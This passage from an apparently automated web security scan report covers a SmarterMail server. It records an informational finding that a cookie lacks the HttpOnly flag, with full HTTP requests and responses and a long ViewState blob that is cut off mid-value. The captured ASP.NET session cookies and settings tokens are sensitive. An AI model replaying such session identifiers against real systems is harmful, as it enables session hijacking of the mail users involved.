Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STHashCookie={"CountsGuid":"727329652","TopBarSection":"UserStorage","RootLPSize":300}; STTTState=

Response

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:27:13 GMT
X-AspNet-Version: 2.0.50727
Location: /frmError.aspx?aspxerrorpath=/Default.aspx
Set-Cookie: SM5Skin=Default; expires=Sat, 03-Oct-2020 00:27:11 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 167
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ffrmError.aspx%3faspxerrorpath%3d%2fDefault.aspx">here</a>.</h2>
</body></html>

6.2. http://vulnerable.smartermail.site:9998/Main/frmCalendar.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/frmCalendar.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Main/frmCalendar.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: vulnerable.smartermail.site:9998
Cookie: SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 14:08:48 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=bnte0k45hsaho145vo54gob1; path=/; HttpOnly
Set-Cookie: SM5Skin=Default; expires=Sat, 03-Oct-2020 14:08:48 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 51049



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Calendar - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<link href="/WebResource.axd?d=zpx5ZPr_A4Xj1BaWRse8fIv63FDK5xX5aVnnyKmjTOWIp31Dymcy2GN7xJML4YReWQB5iODd6AcWlBiYBjbFSA2&amp;t=634214510020000000" type="text/css" rel="stylesheet" class="Telerik_stylesheet" /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
   <form method="post" action="frmCalendar.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTE0MTU5OTM3NQ8WCB4IX19fVGl0bGUFC015IENhbGVuZGFyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeB19fc3RhdGUyjgUAAQAAAP////8BAAAAAAAAAAwCAAAAT1NNV2ViLCBWZXJzaW9uPTcuMi4zOTI1LjI0NTIxLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWMzOWQzMzQ4NjU2ZTUxNmMMAwAAAFlSZW1vdGVJbnRlcmZhY2UsIFZlcnNpb249Ny4yLjM5MjUuMjQ1MTIsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YzM5ZDMzNDg2NTZlNTE2YwUBAAAAKlNNV2ViLkhlbHBlckNsYXNzZXMuQ2FsZW5kYXIuQ2FsZW5kYXJTdGF0ZQoAAAAER3VpZAxTZWFyY2hTdHJpbmcIQ2F0ZWdvcnkNU2hvd1JlY3VycmluZwpTaG93QWxsRGF5BE1vZGUORm9jdXNlZERhdGVVVEMRUmVzb3VyY2VPd25lclVzZXISUmVzb3VyY2VPd25lckVtYWlsA1NDRAEBAQAABAABAQQBASlTTVdlYi5IZWxwZXJDbGFzc2VzLkNhbGVuZGFyLkNhbGVuZGFyTW9kZQIAAAANPFNtYXJ0ZXJUb29scy5TbWFydGVyTWFpbC5SZW1vdGluZy5TaGFyaW5nLlNoYXJlQ29ubmVjdG9yRGF0YQMAAAACAAAABgQAAAAgYWI5OGY0YWJlYzRiNDdjMjhlNjEwZTA4NmFiNzM4YzEGBQAAAAAJBQAAAAEBBfr///8pU01XZWIuSGVscGVyQ2xhc3Nlcy5DYWxlbmRhci5DYWxlbmRhck1vZGUBAAAAB3ZhbHVlX18ACAIAAAAAAAAAANoGohsxzUgGBwAAAAVldXNlcgYIAAAAEWV1c2VyQGhveXRsbGMuY29tCgsWAmYPZBYCAgEPZBYMAgMPZBYEAgEPZBYCAgEPZBYCZg9kFgICAQ9kFgQCAQ9kFgRmDxYCHgdWaXNpYmxlaGQCAQ8WAh8EaGQCAg9kFgJmD2QWAmYPFgIfBGhkAgMPZBYCAgEPZBYCAgEPDxYCHgRUZXh0BQlTZWFyY2guLi5kZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8EaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh8FZWQCCQ9kFgICAw9kFgJmD2QWCAIBD2QWAmYPZBYIZg9kFgICAQ8PFgIeCEltYWdlVXJsBSsvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9NaXNjL05hdkxlZnQucG5nZGQCAQ9kFgICAQ8PFgIfBwUsL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvTWlzYy9OYXZSaWdodC5wbmdkZAICD2QWAgIBDw8WAh8FBRhTdW5kYXksIE9jdG9iZXIgMDMsIDIwMTBkZAIDD2QWAgIBDw8WAh8HBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZmRkAgMPFgIfBGhkAgcPDxYCHwRnZBYEAgEPFgIfBGhkAgMPFgIeC18hSXRlbUNvdW50AgoWFAIBD2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUkvTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAzLzIwMTAmdGltZT04JnVzZXI9ZXVzZXImbWFwcGVkPWZhbHNlBDggQU0BOAE4EVJpZ2h0Q2xpY2thYmxlTmV3A0FsdGQCAg9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlJL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMy8yMDEwJnRpbWU9OSZ1c2VyPWV1c2VyJm1hcHBlZD1mYWxzZQQ5IEFNATkBORFSaWdodENsaWNrYWJsZU5ldwBkAgMPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDMvMjAxMCZ0aW1lPTEwJnVzZXI9ZXVzZXImbWFwcGVkPWZhbHNlBTEwIEFNAjEwAjEwEVJpZ2h0Q2xpY2thYmxlTmV3A0FsdGQCBA9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMy8yMDEwJnRpbWU9MTEmdXNlcj1ldXNlciZtYXBwZWQ9ZmFsc2UFMTEgQU0CMTECMTERUmlnaHRDbGlja2FibGVOZXcAZAIFD2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAzLzIwMTAmdGltZT0xMiZ1c2VyPWV1c2VyJm1hcHBlZD1mYWxzZQUxMiBQTQIxMgIxMhFSaWdodENsaWNrYWJsZU5ldwNBbHRkAgYPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDMvMjAxMCZ0aW1lPTEzJnVzZXI9ZXVzZXImbWFwcGVkPWZhbHNlBDEgUE0CMTMCMTMRUmlnaHRDbGlja2FibGVOZXcAZAIHD2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAzLzIwMTAmdGltZT0xNCZ1c2VyPWV1c2VyJm1hcHBlZD1mYWxzZQQyIFBNAjE0AjE0EVJpZ2h0Q2xpY2thYmxlTmV3A0FsdGQCCA9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMy8yMDEwJnRpbWU9MTUmdXNlcj1ldXNlciZtYXBwZWQ9ZmFsc2UEMyBQTQIxNQIxNRFSaWdodENsaWNrYWJsZU5ldwBkAgkPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDMvMjAxMCZ0aW1lPTE2JnVzZXI9ZXVzZXImbWFwcGVkPWZhbHNlBDQgUE0CMTYCMTYRUmlnaHRDbGlja2FibGVOZXcDQWx0ZAIKD2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAzLzIwMTAmdGltZT0xNyZ1c2VyPWV1c2VyJm1hcHBlZD1mYWxzZQQ1IFBNAjE3AjE3EVJpZ2h0Q2xpY2thYmxlTmV3AGQCDQ8UKwANDxYWBQxDbGllbnRFdmVudHMPBYUBVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ2FsZW5kYXJDbGllbnRFdmVudHMsIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBYIBQFSBQ1DbGVhckNhbGVuZGFyBQFWBQtTZWxlY3RNb250aAUBQwUNQ2xlYXJDYWxlbmRhcgUBSgUNQ2xlYXJDYWxlbmRhcgUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBQNFVlNnBRtVc2VDb2x1bW5IZWFkZXJzQXNTZWxlY3RvcnNoBQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjM1LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwABBgBAfg6lMM1IBRJOYXZpZ2F0aW9uUHJldlRleHRlBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAPFgYeBFNraW4FDFNtYXJ0ZXJUb29scx4TRW5hYmxlRW1iZWRkZWRTa2luc2geF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naGRkFgQeCENzc0NsYXNzBQtyY01haW5UYWJsZR4EXyFTQgICFgQfDAUMcmNPdGhlck1vbnRoHw0CAmQWBB8MBQpyY1NlbGVjdGVkHw0CAmQWBB8MBQpyY0Rpc2FibGVkHw0CAhYEHwwFDHJjT3V0T2ZSYW5nZR8NAgIWBB8MBQlyY1dlZWtlbmQfDQICFgQfDAUHcmNIb3Zlch8NAgIWBB8MBTZSYWRDYWxlbmRhck1vbnRoVmlldyBSYWRDYWxlbmRhck1vbnRoVmlld19TbWFydGVyVG9vbHMfDQICFgQfDAUJcmNWaWV3U2VsHw0CAmQCCw9kFgICAw9kFgICAQ9kFgJmD2QWAgIBDw8WAh8FZWRkGAYFF2N0bDAwJFRQSCR0c1RhYnMkdGFiQWxsDzLNCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAOTUVOVV9BbGxFdmVudHMB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQKC2QFGmN0bDAwJFRQSCR0c1RhYnMkdGFiV2Vla2x5DzLGCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAHQFdlZWtseQH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAoLZAUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgUFFGN0bDAwJE1QSCRidG5OYXZMZWZ0BRVjdGwwMCRNUEgkYnRuTmF2UmlnaHQFFWN0bDAwJE1QSCRidG5DYWxQb3B1cAUXY3RsMDAkTVBIJGNhbERhdGVQaWNrZXIFF2N0bDAwJE1QSCRjYWxEYXRlUGlja2VyBRljdGwwMCRUUEgkdHNUYWJzJHRhYkRhaWx5DzLFCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAGQERhaWx5AfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lECgtkBRtjdGwwMCRUUEgkdHNUYWJzJHRhYk1vbnRobHkPMscLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1